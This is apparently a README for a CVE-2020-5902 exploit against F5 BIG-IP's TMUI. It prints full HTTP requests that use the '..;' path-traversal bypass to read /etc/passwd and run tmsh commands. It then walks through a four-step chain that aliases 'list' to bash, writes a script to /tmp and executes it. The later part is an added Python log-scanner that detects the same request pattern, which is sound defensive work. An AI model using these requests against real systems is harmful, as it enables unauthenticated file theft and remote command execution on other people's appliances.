# CVE-2020-5902_RCE_EXP
Blog: [http://www.svenbeast.com/post/cve-2020-5902](http://www.svenbeast.com/post/cve-2020-5902-big-ip-rce-rao-guo-tmsh-xian-zhi-ming-ling-zhi-xing-andexp-bian/)

### Read File
Example: https://x.x.x.x/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
```
GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8
Cookie: JSESSIONID=89E562018185E75966F67E7FC50CF6E1
```

### F5 RCE
Example: https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user
```
GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8
Cookie: JSESSIONID=07E7975B5F6F4B43F3375AA5FFB32628
```

### RCE
* 1. Modify the alias so that `list` maps to the `bash` command
```
https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
```
* 2. Create a bash file and write the command to be executed into it
```
https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/checksafe&content=whoami
```
* 3. Execute the bash file
```
https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/checksafe
```
* 4. Restore the alias setting so the target's normal operation is not affected
```
https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list
```
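Every request shown on this page shares one shape: the `/tmui/login.jsp/..;/` prefix followed by one of the TMUI workspace endpoints (`fileRead.jsp`, `fileSave.jsp`, `tmshCmd.jsp`). That makes it a clean target for log-based detection. The following is an added example written for this README, not code from the repository or from the blog it links; it scans access-log lines for that pattern. The log lines, IP addresses and the `SENSITIVE_ENDPOINTS` mapping are constructed for illustration, and the common-log-format regex is an assumption about how the front-end logs requests.

```python
"""Detect the CVE-2020-5902 request pattern in web access logs.

Added example (not part of the original repository). Flags the ';'-based
path-traversal prefix and the TMUI workspace endpoints named on this page.
Sample log lines below are constructed, not real traffic.
"""
import re
from urllib.parse import unquote

# Prefix that reaches TMUI pages without a valid session: "/tmui/login.jsp/..;/".
TRAVERSAL_RE = re.compile(r"/tmui/login\.jsp/\.\.;/", re.IGNORECASE)

# Endpoints referenced on this page and what each grants (constructed mapping).
SENSITIVE_ENDPOINTS = {
    "/tmui/locallb/workspace/fileread.jsp": "arbitrary file read",
    "/tmui/locallb/workspace/filesave.jsp": "arbitrary file write",
    "/tmui/locallb/workspace/tmshcmd.jsp": "tmsh command execution",
}

# Common-log-format-style line (assumed layout): ip ident user [ts] "METHOD path proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def classify_request(path):
    """Return (severity, reason) for a request path, or None if nothing matches.

    The path is URL-decoded twice so that an encoded ';' (%3B) or '.' (%2e),
    encoded once or twice, still lines up with the literal pattern.
    """
    decoded = unquote(unquote(path))
    path_only = decoded.split("?", 1)[0].lower()
    traversal = bool(TRAVERSAL_RE.search(decoded))
    endpoint = next(
        ((ep, purpose) for ep, purpose in SENSITIVE_ENDPOINTS.items() if ep in path_only),
        None,
    )
    if traversal and endpoint:
        return ("high", f"auth bypass prefix + {endpoint[1]} ({endpoint[0]})")
    if traversal:
        return ("medium", "auth bypass prefix on a TMUI path")
    if endpoint:
        # Legitimate admins also use these pages; worth a look, not an alarm.
        return ("low", f"{endpoint[1]} endpoint reached without bypass prefix")
    return None


def scan_log(lines):
    """Parse access-log lines and return one finding dict per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed log layout
        verdict = classify_request(m["path"])
        if verdict:
            findings.append(
                {"ip": m["ip"], "ts": m["ts"], "severity": verdict[0],
                 "reason": verdict[1], "path": m["path"]}
            )
    return findings


# Constructed sample log: two bypass attempts, one normal login page hit,
# one authenticated (no prefix) use of fileSave.jsp.
SAMPLE_LOG = [
    '203.0.113.10 - - [05/Jul/2020:10:15:01 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.10 - - [05/Jul/2020:10:15:07 +0000] "GET /tmui/login.jsp/..%3B/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user HTTP/1.1" 200 912',
    '198.51.100.7 - - [05/Jul/2020:10:16:00 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Jul/2020:10:16:30 +0000] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 200 77',
]


def scan_sample():
    """Run the detector over the constructed sample log."""
    return scan_log(SAMPLE_LOG)


if __name__ == "__main__":
    for f in scan_sample():
        print(f"[{f['severity']:6}] {f['ip']} {f['ts']} {f['reason']}: {f['path']}")
```

The double `unquote` is deliberate: the literal `..;` in the requests above is the simplest form, and a detector that only matches it will miss an encoded semicolon. The "low" tier exists because the same JSP pages are what an authenticated administrator uses, so an endpoint hit without the bypass prefix is context, not evidence on its own.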

### References
https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4
https://github.com/jas502n/CVE-2020-5902